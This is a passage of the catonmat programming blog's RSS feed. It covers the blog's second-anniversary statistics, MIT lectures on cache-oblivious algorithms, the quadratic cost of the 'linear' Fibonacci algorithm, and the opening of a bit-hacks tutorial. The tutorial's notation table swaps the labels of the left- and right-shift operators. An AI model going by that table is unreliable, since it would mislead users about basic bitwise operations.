<li><a href="http://eriwen.com/">Eric Wendelin&#8217;s blog</a> (1,693 visitors).</li>
<li><a href="http://perlbuzz.com/">Andy Lester&#8217;s PerlBuzz blog</a> (1,356 visitors).</li>
<li><a href="http://www.noop.nl/">Jurgen Appelo&#8217;s blog</a> (1,001 visitors)</li>
</ul>
<p>I found that just a handful of blogs had linked to me during this year. The main reason, I suspect, is that I do not link out much myself&#8230; It&#8217;s something to improve upon.</p>
<p>If you remember, I ended the last year&#8217;s post with the following words (I had only 1000 subscribers at that time):</p>
<blockquote><p>I am setting myself a goal of reaching <strong>5000 subscribers</strong> by the end of the next year of blogging (July 2009)! I know that this is very ambitious goal but I am ready to take the challenge!</p></blockquote>
<p>I can proudly say that I reached my ambitious goal! My blog now has almost <strong>7000 subscribers</strong>! If you have not yet subscribed, <a href="http://www.catonmat.net/feed/">click here</a> to do it!</p>
<p>Here is the RSS subscriber graph for the whole two years:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/rss-subscribers-two-years.jpg' alt='RSS Subscriber Count, Two Years of Blogging' />
</div>
<p>Several months ago I approximated the subscriber data with an exponent function and it produced a good fit. Probably if I had continued writing articles at the same pace I did three months ago, I&#8217;d have over 10,000 subscribers now.</p>
<p>Anyway, let&#8217;s now turn to the <strong>top 10 most viewed posts</strong>:</p>
<ul>
<li>1. <a href="http://www.catonmat.net/blog/my-job-interview-at-google/">My job interview experience at Google</a> (144,400 views).</li>
<li>2. <a href="http://www.catonmat.net/blog/unix-utilities-pipe-viewer/">A Unix Utility You Should Know About: Pipe Viewer</a> (124,570 views)</li>
<li>3. <a href="http://www.catonmat.net/blog/code-reuse-in-google-chrome-browser/">Code Reuse in Google Chrome Browser</a> (115,750 views).</li>
<li>4. <a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-one/">Famous Awk One-Liners Explained, Part I</a> (87,721 views).</li>
<li>5. <a href="http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-one/">MIT Introduction to Algorithms, Part I: Analysis of Algorithms</a> (79,536 views).</li>
<li>6. <a href="http://www.catonmat.net/blog/unix-utilities-netcat/">A Unix Utility You Should Know About: Netcat</a> (51,354 views).</li>
<li>7. <a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-one/">Famous Sed One-Liners Explained, Part I</a> (49,068 views).</li>
<li>8. <a href="http://www.catonmat.net/blog/vim-plugins-surround-vim/">Vim Plugins You Should Know About, Part I: surround.vim</a> (41,388 views).</li>
<li>9. <a href="http://www.catonmat.net/blog/ten-awk-tips-tricks-and-pitfalls/">10 Awk Tips, Tricks and Pitfalls</a> (29,689 views).</li>
<li>10. <a href="http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/">Low Level Bit Hacks You Absolutely Must Know</a> (22,916 views).</li>
</ul>
<p>The article that I liked the most myself but which didn&#8217;t make it to top ten was the &#8220;<a href="http://www.catonmat.net/blog/set-operations-in-unix-shell/">Set Operations in Unix Shell</a>&#8220;. I just love this Unix stuff I did there.</p>
<p>I am also very proud for the following three article series that I wrote:</p>
<ul>
<li>1. Review of MIT&#8217;s Introduction to Algorithms course (<a href="http://www.catonmat.net/blog/category/introduction-to-algorithms/">14 parts</a>).</li>
<li>2. Famous Awk One-Liners Explained (4 parts: <a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-one/">1</a>, <a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-two/">2</a>, <a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-three/">3</a>, <a href="http://www.catonmat.net/blog/update-on-famous-awk-one-liners-explained/">4</a>).</li>
<li>3. Famous Sed One-Liners Explained (3 parts: <a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-one/">1</a>, <a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-two/">2</a>, <a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-three/">3</a>)</li>
</ul>
<p>Finally, here is a list of ideas that I have thought for the third year of blogging:</p>
<ul>
<li>Publish three e-books on <a href="http://www.catonmat.net/blog/awk-one-liners-explained-part-one/">Awk One-Liners</a>, <a href="http://www.catonmat.net/blog/sed-one-liners-explained-part-one/">Sed One-Liners</a> and <a href="http://www.catonmat.net/blog/perl-one-liners-explained-part-one/">Perl One-Liners</a>.</li>
<li>Launch mathematics, physics and general science blog.</li>
<li>Write about mathematical foundations of cryptography and try to implement various cryptosystems and cryptography protocols.</li>
<li>Publish my review of MIT&#8217;s Linear Algebra course (in math blog, so the main topic of catonmat stays computing).</li>
<li>Publish my review of MIT&#8217;s Physics courses on Mechanics, Electromagnetism, and Waves (in physics blog).</li>
<li>Publish my notes on how I learned the C++ language.</li>
<li>Write more about computer security and ethical hacking.</li>
<li>Write several book reviews.</li>
<li>Create a bunch of various fun utilities and programs.</li>
<li>Create at least one useful web project.</li>
<li>Add a knowledge database to catonmat, create software to allow easy publishing to it.</li>
<li>If time allows, publish reviews of important computer science publications.</li>
</ul>
<p>I&#8217;ll document everything here as I go, so if you are interested in these topics stay with me by subscribing to <a href="http://www.catonmat.net/feed/">my rss feed</a>!</p>
<p>And to make things more challenging again, I am setting a new goal for the next year of blogging. The goal is to reach <strong>20,000 subscribers</strong> by July 2010!</p>
<p>Hope to see you all on my blog again! Now it&#8217;s time for this delicious cake:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/second-birthday-portal-cake.jpg' alt='Second Birthday Portal Game Cake' />
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=qiPo_NXaNWc:BgQcTncY29U:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=qiPo_NXaNWc:BgQcTncY29U:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=qiPo_NXaNWc:BgQcTncY29U:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=qiPo_NXaNWc:BgQcTncY29U:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=qiPo_NXaNWc:BgQcTncY29U:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=qiPo_NXaNWc:BgQcTncY29U:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=qiPo_NXaNWc:BgQcTncY29U:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/qiPo_NXaNWc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/two-years-of-blogging/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/two-years-of-blogging/</feedburner:origLink></item>
		<item>
		<title>MIT’s Introduction to Algorithms, Lectures 22 and 23: Cache Oblivious Algorithms</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/Bh8tnqPvRh4/</link>
		<comments>http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-fourteen/#comments</comments>
		<pubDate>Mon, 13 Jul 2009 03:00:32 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Introduction to Algorithms]]></category>
<category>algorithms</category><category>binary search</category><category>binary search trees</category><category>cache</category><category>cache aware algorithms</category><category>cache aware sorting</category><category>cache oblivious algorithms</category><category>cache oblivious sorting</category><category>disk</category><category>funnel sort</category><category>k funnel</category><category>l1</category><category>l2</category><category>l3</category><category>matrix multiplication</category><category>memory</category><category>mit</category><category>order statistics</category><category>sorting</category><category>static search trees</category><category>two level memory model</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-fourteen/</guid>
		<description><![CDATA[This is a happy and sad moment at the same time - I have finally reached the last two lectures of MIT&#8217;s undergraduate algorithms course. These last two lectures are on a fairly new area of algorithm research called &#8220;cache oblivious algorithms.&#8221;
Cache-oblivious algorithms take into account something that has been ignored in all the lectures [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2008/08/post-icon.jpg' alt='MIT Algorithms' class="post-icon" align="left" />This is a happy and sad moment at the same time - I have finally reached the last two lectures of MIT&#8217;s undergraduate algorithms course. These last two lectures are on a fairly new area of algorithm research called &#8220;<strong>cache oblivious algorithms</strong>.&#8221;</p>
<p>Cache-oblivious algorithms take into account something that has been ignored in all the lectures so far, particularly, the multilevel memory hierarchy of modern computers. Retrieving items from various levels of memory and cache make up a dominant factor of running time, so for speed it is crucial to minimize these costs. The main idea of cache-oblivious algorithms is to achieve optimal use of caches on all levels of a memory hierarchy <em>without knowledge of their size</em>.</p>
<p>Cache-oblivious algorithms should not be confused with <strong>cache-aware algorithms</strong>. Cache-aware algorithms and data structures explicitly depend on various hardware configuration parameters, such as the cache size. Cache-oblivious algorithms do not depend on any hardware parameters. An example of cache-aware (not cache-oblivious) data structure is a B-Tree that has the explicit parameter B, the size of a node. The main disadvantage of cache-aware algorithms is that they are based on the knowledge of the memory structure and size, which makes it difficult to move implementations from one architecture to another. Another problem is that it is very difficult, if not impossible, to adapt some of these algorithms to work with multiple levels in the memory hierarchy. Cache-oblivious algorithms solve both problems.</p>
<p>Lecture twenty-two introduces the terminology and notation used in cache-oblivious algorithms, explains the difference between cache-oblivious and cache-aware algorithms, does a simple memory analysis of several simple algorithms and culminates with a cache-oblivious algorithm for matrix multiplication.</p>
<p>The final lecture twenty-three is the most difficult in the whole course and shows cache-oblivious binary search trees and cache-oblivious sorting called funnel sort.</p>
<p>Use this supplementary reading material by professor Demaine to understand the material better: <a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/cacheobliviousalgorithmsanddatastructures.pdf' title='Cache-Oblivious Algorithms and Data Structures'>Cache-oblivious algorithms and data structures (.pdf)</a>.</p>
<h2 style="margin-bottom:10px">Lecture 22: Cache Oblivious Algorithms I</h2>
<p>Lecture twenty-two starts with an introduction to the modern memory hierarchy (CPU cache L1, L2, L3, main memory, disk cache, etc.) and with the notation and core concepts used in cache-oblivious algorithms.</p>
<p>A powerful result in cache-oblivious algorithm design is that if an algorithm is efficient on two levels of cache, then it&#8217;s efficient on any number of levels. Thus the study of cache-obliviousness can be simplified to two-level memory hierarchy, say the CPU cache and main memory, where the accesses to cache are instant but are orders of magnitude slower to main memory. Therefore the main question cache-oblivious algorithm analysis tries to address is how many memory transfers (MTs) does a problem of size N take. The notation used for this is MT(N). For an algorithm to be efficient, the number of memory transfers should be as small as possible.</p>
<p>Next the lecture analysis the number of memory transfers for basic array scanning and array reverse algorithms. Since array scanning is consequential, N elements can be processed with O(N/B) accesses, where B is the block size - number of elements that are automatically fetched as N-th element is accessed. That is MT(N) = O(N/B) for array scanning. The same bound holds for reversing an array, since it can be viewed two scans - one from the beginning and one from the end.</p>
<p>Next it&#8217;s shown that the classical binary search (covered in <a href="http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-two/">lecture 3</a>) is not cache efficient, but order statistics problem (covered in <a href="http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-four/">lecture 6</a>) is cache efficient.</p>
<p>Finally the lecture describes a cache efficient way to multiply matrices by storing them block-wise in memory.</p>
<p>You&#8217;re welcome to watch lecture twenty-two:</p>
<div class="center-aligner">
<embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=-1965282303585171223&#038;hl=en&#038;fs=true&#038;subtitle=off" style="width:400px;height:326px" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> </embed></p>
<p>Direct URL: <a href="http://video.google.com/videoplay?docid=-1965282303585171223">http://video.google.com/videoplay?docid=-1965282303585171223</a>
</div>
<p>Topics covered in lecture twenty-two:</p>
<ul>
<li>[00:10] Introduction and history of cache-oblivious algorithms.</li>
<li>[02:00] Modern memory hierarchy in computers: Caches L1, L2, L3, main memory, disk cache.</li>
<li>[06:15] Formula for calculating the cost to access a block of memory.</li>
<li>[08:18] Amortized cost to access one element in memory.</li>
<li>[11:00] Spatial and temporal locality of algorithms.</li>
<li>[13:45] Two-level memory model.</li>
<li>[16:30] Notation: total cache size M, block size B, number of blocks M/B.</li>
<li>[20:40] Notation: MT(N) - number of memory transfers of a problem of size N.</li>
<li>[21:45] Cache-aware algorithms.</li>
<li>[22:50] Cache-oblivious algorithms.</li>
<li>[28:35] Blocking of memory.</li>
<li>[32:45] Cache-oblivious scanning algorithm (visitor pattern).</li>
<li>[36:20] Cache-oblivious Array-Reverse algorithm.</li>
<li>[39:05] Memory transfers in classical binary search algorithm.</li>
<li>[43:45] Divide and conquer algorithms.</li>
<li>[45:50] Analysis of memory transfers in order statistics algorithm.</li>
<li>[01:00:50] Analysis of classical matrix multiplication (with row major, column major memory layout).</li>
<li>[01:07:30] Cache oblivious matrix multiplication.</li>
</ul>
<p>Lecture twenty-two notes:</p>
<div class="center-aligner">
<table>
<tr>
<td align="center" valign="top">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-22-01.jpg' title='MIT Algorithms Lecture 22 Notes Thumbnail. Page 1 of 2.'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-22-01-thumb.jpg' alt='MIT Algorithms Lecture 22 Notes Thumbnail. Page 1 of 2.' /></a><br />
<small>Lecture 22, page 1 of 2: modern memory hierarchy, spacial and temporal locality, two-level memory model, blocking of memory, basic algorithms: parallel scan.</small>
</td>
<td width="10"></td>
<td align="center" valign="top">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-22-02.jpg' title='MIT Algorithms Lecture 22 Notes Thumbnail. Page 2 of 2.'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-22-02-thumb.jpg' alt='MIT Algorithms Lecture 22 Notes Thumbnail. Page 2 of 2.' /></a><br />
<small>Lecture 22, page 2 of 2: basic algorithms: binary search, divide and conquer algorithms, order statistics, matrix multiplication, block algorithms.</small>
</td>
</tr>
</table>
</div>
<h2 style="margin-bottom:10px">Lecture 23: Cache Oblivious Algorithms II</h2>
<p>This was probably the most complicated lecture in the whole course. The whole lecture is devoted to two subjects - cache-oblivious search trees and cache-oblivious sorting.</p>
<p>While it&#8217;s relatively easy to understand the design of cache-oblivious way of storing search trees in memory, it&#8217;s amazingly difficult to understand the cache-efficient sorting. It&#8217;s called funnel sort which is basically an n-way merge sort (covered in <a href="http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-one/">lecture 1</a>) with special cache-oblivious merging function called k-funnel.</p>
<p>You&#8217;re welcome to watch lecture twenty-three:</p>
<div class="center-aligner">
<embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=-5349583735068377717&#038;hl=en&#038;fs=true&#038;subtitle=off" style="width:400px;height:326px" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> </embed></p>
<p>Direct URL: <a href="http://video.google.com/videoplay?docid=-5349583735068377717">http://video.google.com/videoplay?docid=-5349583735068377717</a>
</div>
<p>Topics covered in lecture twenty-three:</p>
<ul>
<li>[01:00] Cache-oblivious static search trees (binary search trees).</li>
<li>[09:35] Analysis of static search trees.</li>
<li>[18:15] Cache-aware sorting.</li>
<li>[19:00] Sorting by repeated insertion in binary tree.</li>
<li>[21:40] Sorting by binary merge sort.</li>
<li>[31:20] Sorting by N-way mergesort.</li>
<li>[36:20] Sorting bound for cache-oblivious sorting algorithms.</li>
<li>[38:30] Cache-oblivious sorting.</li>
<li>[41:40] Definition of K-Funnel (cache-oblivious merging).</li>
<li>[43:35] Funnel sort.</li>
<li>[54:05] Construction of K-Funnel.</li>
<li>[01:03:10] How to fill buffer in k-funnel.</li>
<li>[01:07:30] Analysis of fill buffer.</li>
</ul>
<p>Lecture twenty-three notes:</p>
<div class="center-aligner">
<table>
<tr>
<td align="center" valign="top">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-23-01.jpg' title='MIT Algorithms Lecture 23 Notes Thumbnail. Page 1 of 2.'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-23-01-thumb.jpg' alt='MIT Algorithms Lecture 23 Notes Thumbnail. Page 1 of 2.' /></a><br />
<small>Lecture 23, page 1 of 2: static search trees, cache aware sorting.</small>
</td>
<td width="10"></td>
<td align="center" valign="top">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-23-02.jpg' title='MIT Algorithms Lecture 23 Notes Thumbnail. Page 2 of 2.'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/mit-algorithms-lecture-23-02-thumb.jpg' alt='MIT Algorithms Lecture 23 Notes Thumbnail. Page 2 of 2.' /></a><br />
<small>Lecture 23, page 2 of 2: cache oblivious sorting, k-funnels, funnel sort, fill-buffer algorithm and analysis.</small>
</td>
</tr>
</table>
</div>
<p><a name="promise"></a><br />
Have fun with the cache oblivious algorithms! I&#8217;ll do a few more posts that will summarize all these lectures and highlight key ideas.</p>
<p>If you loved this, please <a href="http://www.catonmat.net/feed/">subscribe to my blog</a>!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=Bh8tnqPvRh4:thhoNzGFnJk:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Bh8tnqPvRh4:thhoNzGFnJk:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Bh8tnqPvRh4:thhoNzGFnJk:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Bh8tnqPvRh4:thhoNzGFnJk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Bh8tnqPvRh4:thhoNzGFnJk:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Bh8tnqPvRh4:thhoNzGFnJk:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Bh8tnqPvRh4:thhoNzGFnJk:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/Bh8tnqPvRh4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-fourteen/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/mit-introduction-to-algorithms-part-fourteen/</feedburner:origLink></item>
		<item>
		<title>On the Linear Time Algorithm For Finding Fibonacci Numbers</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/5t59FUZ0rFo/</link>
		<comments>http://www.catonmat.net/blog/on-the-linear-time-algorithm-for-finding-fibonacci-numbers/#comments</comments>
		<pubDate>Tue, 07 Jul 2009 04:45:08 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>algorithm</category><category>algorithm analysis</category><category>fibonacci</category><category>fibonacci numbers</category><category>linear</category><category>quadratic</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/on-the-linear-time-algorithm-for-finding-fibonacci-numbers/</guid>
		<description><![CDATA[In this article I&#8217;d like to show how the theory does not always match the practice. I am sure you all know the linear time algorithm for finding Fibonacci numbers. The analysis says that the running time of this algorithm is O(n). But is it still O(n) if we actually run it? If not, what [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/fibonacci-of-pisa.jpg' alt='Fibonacci of Pisa' class="post-icon" align="left" />In this article I&#8217;d like to show how the theory does not always match the practice. I am sure you all know the linear time algorithm for finding Fibonacci numbers. The analysis says that the running time of this algorithm is O(n). But is it still O(n) if we actually run it? If not, what is wrong?</p>
<p>Let&#8217;s start with the simplest linear time implementation of the Fibonacci number generating algorithm in Python:</p>
<pre>
def LinearFibonacci(n):
  fn = f1 = f2 = 1
  for x in xrange(2, n):
    fn = f1 + f2
    f2, f1 = f1, fn
  return fn
</pre>
<p>The theory says that this algorithm should run in O(n) - given the n-th Fibonacci number to find, the algorithm does a single loop up to n. </p>
<p>Now let&#8217;s verify if this algorithm is really linear in practice. If it&#8217;s linear then the plot of <em>n</em> vs. running time of LinearFibonacci(n) should be a line. I plotted these values for n up to 200,000 and here is the plot that I got:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/quadratic-performance-of-linear-fibonacci-algorithm-fixed.gif' alt='Quadratic performance of linear algorithm' /><br />
<small><strong>Note</strong>: Each data point was averaged over 10 calculcations.</small>
</div>
<p>Oh no! This does not look linear at all! It looks quadratic! I fitted the data with a quadratic function and it fit nearly perfectly. Do you know why the seemingly linear algorithm went quadratic?</p>
<p>The answer is that the theoretical analysis assumed that all the operations in the algorithm executed in constant time. But this is not the case when we run the algorithm on a real machine! As the Fibonacci numbers get larger, each addition operation for calculating the next Fibonacci number &#8220;fn = f1 + f2 &#8221; runs in time proportional to the length of the previous Fibonacci number. It&#8217;s because these huge numbers no longer fit in the basic units of computation in the CPU; so a big integer library is required. The addition of two numbers of length O(n) in a big integer library takes time of O(n).</p>
<p>I&#8217;ll show you that the running time of the real-life linear Fibonacci algorithm really is O(n^2) by taking into account this hidden cost of bigint library.</p>
<p>So at each iteration <em>i</em> we have a hidden cost of O(number of digits of f<sub>i</sub>) = O(digits(f<sub>i</sub>)). Let&#8217;s sum these hidden cost for the whole loop up to n:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/total-hidden-bigint-fibonacci-cost.gif' alt='Hidden bigint cost in linear fibonacci' />
</div>
<p>Now let&#8217;s find the number of digits in the n-th Fibonacci number. To do that let&#8217;s use the well-known <a href="http://mathworld.wolfram.com/BinetsFibonacciNumberFormula.html">Binet&#8217;s formula</a>, which tells us that the n-th Fibonacci number f<sub>n</sub> can be expressed as:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/binets-fibonacci-formula.gif' alt='Binet’s Fibonacci Formula' />
</div>
<p>It is also well-known that the number of digits in a number is integer part of log<sub>10</sub>(number) + 1. Thus the number of digits in the n-th Fibonacci number is:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/fibonacci-digits.gif' alt='Digits in the n-th Fibonacci number' />
</div>
<p>Thus if we now sum all the hidden costs for finding the n-th Fibonacci number we get:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/total-hidden-fibonacci-cost-final-answer.gif' alt='Hidden integer library cost in linear fibonacci algorithm' />
</div>
<p>There we have it. The running time of this &#8220;linear&#8221; algorithm is actually quadratic if we take into consideration that each addition operation runs proportionally to the length of addends.</p>
<p>Next time I&#8217;ll show you that if the addition operation runs in constant time, then the algorithm is truly linear; and later I will do a similar analysis of the logarithmic time algorithm for finding Fibonnaci numbers that uses this awesome matrix identity:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/07/fibonacci-matrix-identity.gif' alt='Fibonacci Fibonnaci Matrix Identity' />
</div>
<p>Don&#8217;t forget to <a href="http://www.catonmat.net/feed/">subscribe</a> if you are interested! It&#8217;s well worth every byte!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=5t59FUZ0rFo:_9seDuExulw:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=5t59FUZ0rFo:_9seDuExulw:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=5t59FUZ0rFo:_9seDuExulw:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=5t59FUZ0rFo:_9seDuExulw:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=5t59FUZ0rFo:_9seDuExulw:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=5t59FUZ0rFo:_9seDuExulw:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=5t59FUZ0rFo:_9seDuExulw:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/5t59FUZ0rFo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/on-the-linear-time-algorithm-for-finding-fibonacci-numbers/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/on-the-linear-time-algorithm-for-finding-fibonacci-numbers/</feedburner:origLink></item>
		<item>
		<title>Low Level Bit Hacks You Absolutely Must Know</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/sM02mGRP-r0/</link>
		<comments>http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 11:25:48 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>binary</category><category>bit</category><category>bit hacks</category><category>bitwise and</category><category>bitwise not</category><category>bitwise or</category><category>bitwise shift left</category><category>bitwise shift right</category><category>bitwise xor</category><category>byte</category><category>c</category><category>embedded programming</category><category>even</category><category>hacks</category><category>odd</category><category>perl</category><category>proof</category><category>python</category><category>twos complement</category><category>unsigned integers</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/</guid>
		<description><![CDATA[I decided to write an article about a thing that is second nature to embedded systems programmers - low level bit hacks. Bit hacks are ingenious little programming tricks that manipulate integers in a smart and efficient manner. Instead of performing some operation (such as counting the 1 bits in an integer) by looping over [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/06/microcontroller-bit-hacks.jpg' alt='Bit Hacks' class="post-icon" align="left" />I decided to write an article about a thing that is second nature to embedded systems programmers - <strong>low level bit hacks</strong>. Bit hacks are ingenious little programming tricks that manipulate integers in a smart and efficient manner. Instead of performing some operation (such as counting the 1 bits in an integer) by looping over individual bits, these programming nuggets do the same with one or two carefully chosen bitwise operations.</p>
<p>To get things going I&#8217;ll assume that you know what the two&#8217;s complement binary representation of an integer is and also that you know all the the bitwise operations.</p>
<p>I&#8217;ll use the following notation for bitwise operations in the article:</p>
<pre>
&#038;   -  bitwise and
|   -  bitwise or
^   -  bitwise xor
~   -  bitwise not
&lt;&lt;  -  bitwise shift right
>>  -  bitwise shift left
</pre>
<p>The numbers in the article are 8 bit signed integers (though the operations work on arbitrary length signed integers) that are represented as two&#8217;s complement and they are usually named &#8216;x&#8217;. The result is usually &#8216;y&#8217;. The individual bits of &#8216;x&#8217; are named b7, b6, b5, b4, b3, b3, b2, b1 and b0. The bit b7 is the sign bit (the most significant bit), and b0 is the least significant.</p>
<p>I&#8217;ll start with the most basic bit hacks and gradually progress to more difficult ones. I&#8217;ll use examples to explain how each bithack works.</p>
<p>If you are intrigued by this topic I urge you to <a href="http://www.catonmat.net/feed/">subscribe to my blog</a>. I can share a secret that there will be the 2nd part of this article where I cover more advanced bit hacks, and I will also release a cheat sheet with all these bit tricks! <strong>It&#8217;s well worth subscribing</strong>!</p>
<p>Here we go.</p>
<p><strong><a name="bithack1">Bit Hack #1. Check if the integer is even or odd.</a></strong></p>
<pre>
if ((x &#038; 1) == 0) {
  x is even
}
else {
  x is odd
}
</pre>
<p>I am pretty sure everyone has seen this trick. The idea here is that an integer is odd if and only if the least significant bit <em>b0</em> is 1. It follows from the binary representation of &#8216;x&#8217;, where bit <em>b0</em> contributes to either 1 or 0. By AND-ing &#8216;x&#8217; with 1 we eliminate all the other bits than <em>b0</em>. If the result after this operation is 0, then &#8216;x&#8217; was even because bit <em>b0</em> was 0. Otherwise &#8216;x&#8217; was odd.</p>
<p>Let&#8217;s look at some examples. Let&#8217;s take integer 43, which is odd. In binary 43 is 0010101<strong>1</strong>. Notice that the least significant bit <em>b0</em> is 1 (in bold). Now let&#8217;s AND it with 1:</p>
<pre>
    00101011
&#038;   00000001   (note: 1 is the same as 00000001)
    --------
    00000001
</pre>
<p>See how AND-ing erased all the higher order bits b1-b7 but left bit <em>b0</em> the same it was? The result is thus 1 which tells us that the integer was odd.</p>
<p>Now let&#8217;s look at -43. Just as a reminder, a quick way to find negative of a given number in two&#8217;s complement representation is to invert all bits and add one. So -43 is 11010101 in binary. Again notice that the last bit is 1, and the integer is odd. (Note that if we used one&#8217;s complement it wouldn&#8217;t be true!)</p>
<p>Now let&#8217;s take a look at an even integer 98. In binary 98 is 1100010. </p>
<pre>
    01100010
&#038;   00000001
    --------
    00000000
</pre>
<p>After AND-ing the result is 0. It means that the bit <em>b0</em> of original integer 98 was 0. Thus the given integer is even.</p>
<p>Now the negative -98. It&#8217;s 10011110. Again, bit <em>b0</em> is 0, after AND-ing, the result is 0, meaning -98 is even, which indeed is true.</p>
<p><strong><a name="bithack2">Bit Hack #2. Test if the n-th bit is set.</a></strong></p>
<pre>
if (x &#038; (1&lt;&lt;n)) {
  n-th bit is set
}
else {
  n-th bit is not set
}
</pre>
<p>In the previous bit hack we saw that (x <font face="arial">&#038;</font> 1) tests if the first bit is set. This bit hack improves this result and tests if n-th bit is set. It does it by shifting that first 1-bit n positions to the left and then doing the same AND operation, which eliminates all bits but n-th.</p>
<p>Here is what happens if you shift 1 several positions to the left:</p>
<pre>
1         00000001    (same as 1<<0)
1<<1      00000010
1<<2      00000100
1<<3      00001000
1<<4      00010000
1<<5      00100000
1<<6      01000000
1<<7      10000000
</pre>
